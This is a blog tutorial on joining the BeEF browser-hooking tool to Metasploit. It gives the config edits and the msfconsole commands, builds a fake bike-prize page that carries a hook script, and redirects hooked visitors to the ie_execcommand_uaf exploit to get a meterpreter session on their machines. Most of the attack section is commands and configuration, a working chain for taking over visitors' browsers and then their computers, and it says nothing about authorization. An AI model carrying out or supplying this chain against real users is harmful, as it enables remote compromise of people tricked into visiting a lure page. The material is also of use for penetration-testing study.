Integrating Metasploit with Browser Exploitation Framework


last post we getting started with BeEF of how to insert a Javascript link in a page and compromised a client browsers.

So the Browser Exploitation Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun.

But you will have no Metasploit Framework integration by default.

Let’s fix that, by editing first the /usr/share/beef-xss/config.yaml file. You should have something like this:
Obviously, we would like to change the metasploit part (line 20 and 21) to this:

#vi /usr/share/beef-xss/config.yaml


enable: true

Screenshot from 2014-07-08 16:25:29

Next, we will edit the /usr/share/beef-xss/extensions/metasploit/config.yaml file and change it to this:

So you need to edit the lines host:, callback_host: (and put your IP address there) and {os: ‘custom’, path: ”} (just paste the ‘/usr/share/metasploit-framework/’ for the path)

#vi /usr/share/beef-xss/extensions/metasploit/config.yaml

host: “”

pass: “bhuvi”

callback_host: “”

os: ‘custom’, path: ‘/usr/share/metasploit-framework’

Screenshot from 2014-07-08 16:29:10

Now, we are ready to start msfconsole, and load the msgrpc module like this:

#/etc/init.d/postgresql restart && /etc/init.d/metasploit restart

Screenshot from 2014-07-08 16:30:10

#msf> load msgrpc ServerHost= Pass=bhuvi

Screenshot from 2014-07-08 16:33:18

And now, we can start BeEF:

#cd /usr/share/beef-xss/

Among the BeEF start-up messages, you should see something like:

[*] Successful connection with Metasploit.

[*] Loaded 232 Metasploit exploits.

Screenshot from 2014-07-08 16:34:42

Screenshot from 2014-07-08 16:37:37

For Testing we going to create a web html page with javascript hooked.

#vi /var/www/index.html

<title> Win Prices with Latest model Bikes. </title>
<script: src=””></script&gt;
<img src=”bike.jpg”/>

Screenshot from 2014-07-08 17:30:09

Downloaded bike.jpg form google and put it in /var/www directory.

Screenshot from 2014-07-08 23:12:27

Now when any client open the url, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.

Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

Screenshot from 2014-07-08 17:32:42
Now it’s time to use metasploit, after getting complete control of the victims browser use the redirect command to listen on the metasploit connection.


#msf > load msgrpc ServerHost= Pass=bhuvi

#msf > use exploit/windows/browser/ie_execcommand_uaf

#msf exploit(ie_execcommand_uaf) > show options

#msf exploit(ie_execcommand_uaf) > set SRVHOST

msf exploit(ie_execcommand_uaf) > set SRVPORT 8080

#msf exploit(ie_execcommand_uaf) > set URIPATH /

#msf exploit(ie_execcommand_uaf) > exploit

Screenshot from 2014-07-08 17:35:53

Now check out the BeEF control panel. In my case it’s and in command section click the redirect browser and enter the mestasploit listener

Screenshot from 2014-07-09 20:54:25

Screenshot from 2014-07-09 20:54:44

Screenshot from 2014-07-09 20:58:52

Then it will get a meterpreter session….

Screenshot from 2014-07-09 21:34:49


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


IT Security Research and Services


About assembler and stuff

Astr0baby's not so random thoughts _____ rand() % 100;

ψυχῆς ἰατρεῖον "Hospital of the soul"

Penetration Testing Academy

Education and Advice for Rookies

P.M.C.S.P. Blog

Articles about Physics, Math, Computer Security & Programming and more

Chimera | Security


%d bloggers like this: